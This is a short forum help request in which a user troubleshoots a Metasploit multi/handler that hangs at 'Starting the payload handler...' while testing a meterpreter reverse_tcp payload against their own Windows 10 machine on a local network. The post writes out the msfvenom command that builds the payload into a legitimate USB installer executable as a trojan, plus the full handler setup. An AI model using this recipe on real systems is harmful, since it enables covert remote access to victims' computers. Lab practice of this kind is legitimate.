Mathieu Sandera

Metasploit stuck at "Starting the payload handler..."

Discussion created by Mathieu Sandera on May 12, 2017
Latest reply on May 13, 2017 by Mathieu Sandera

Hello everyone,

 

i have a little problem and i hope you can help me ... (excuse my bad english)

so i explain:

 

I just want to try to open a meterpreter session on a Windows 10 64bits pc which is on my local network

for that i use my second pc which is a debian 8 pc. 192.168.192.8

 

i want to try to do a reverse tcp . so i enter this command to create the payload:

 

fvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.192.8 LPORT=4446 -a x64 -f exe --platform windows | msfvenom -x /home/eater/Universal-USB-Installer.exe -o /media/eater/PNY/reverse.exe -f exe -a x64 --platform windows

 

the payload is created succefully that not a problem (i suppose)

after that i go on msfconsole to use multi/handler.Commands:

 

msf > use multi/handler

msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.192.8

LHOST => 192.168.192.8

msf exploit(handler) > set LPORT 4446

LPORT => 4446

msf exploit(handler) > exploit

 

[*] Started reverse TCP handler on 192.168.192.8:4446

[*] Starting the payload handler...

 

And now that the problem...so on the windows 10 pc i start the payload and nothing happened

i have also try with bind_tcp payload or reverse_tcp_allports payload and same result.

if somebody can help me...

 

PS: i have desactivate the firewall on the windows 10 pc

 

thanks,

Eater

Outcomes